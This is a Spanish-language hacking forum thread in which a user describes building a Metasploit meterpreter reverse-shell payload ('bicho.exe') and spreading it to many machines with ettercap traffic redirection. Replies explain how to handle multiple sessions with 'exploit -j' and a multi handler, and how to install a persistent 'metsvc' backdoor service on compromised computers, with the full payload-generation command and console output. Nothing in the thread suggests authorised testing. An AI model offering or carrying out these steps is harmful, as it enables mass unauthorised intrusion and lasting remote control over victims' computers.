Hola , tengo una duda, seré directo con metasploit genere un payload que se llama bicho.exe y con ettercap hago que todo se redirecionen y pues tenga el control ,y funciona lo malo es que como son muchas maquinas al momento de dejar el handler en escucha solo hace 1 session y se quede en meterpreter y como todo sucede al mismo tiempo se pierden las otras conexiones que están en camino.
este es el código para generar el payload:
sudo msfpayload windows/meterpreter/reverse_tcp lhost=192.0.4.54 lport=4444 X > /home/Desktop/bicho.exe
se que en el código esta el truco, quisiera que me ayuden en como puedo hacer que cuando la computadora vulnerada haga click en bicho.exe se redirecione a 192.0.4.54 y si esta, esta con una session meterpreter (osea ocupada ) esta vuelva a redirecionarse en unos 15 segundos.
esa es mi duda y gracias por leerlo espero me respondan Underc0de ! salud2
en el handler ponle la opcion -j ,despues de configurarlo
exploit -j
Puedes usar "metsvc". Permite definir un proceso persistente en la maquina objetivo que se encontrará a la espera de una nueva conexión por parte del atacante, para esto será necesario en primer lugar "migrar" el proceso de la sesión meterpreter actual a otro proceso "persistente" del objetivo, del modo en el que se ha indicando anteriormente con el comando migrate, por este motivo los procesos que resultan mas interesantes son aquellos propios del sistema operativo, posteriormente se puede ejecutar:
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\DOCUME~1\Owner\LOCALS~1\Temp\lZBdswMe...
[*] >> Uploading metsrv.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
Como se puede apreciar la backdoor se ha instalado correctamente en el objetivo, ahora es posible realizar una conexión activa (ya no es necesario esperar de forma pasiva a que un usuario ejecute el fichero .exe que habilitará la sesión meterpreter).
Fuente: http://thehackerway.com/2011/04/26/conceptos-basicos-de-meterpreter-metasploit-framework/
Haz uso de un multi handler para que tus sesiones se conecten y ya ! .
Regards,
Snifer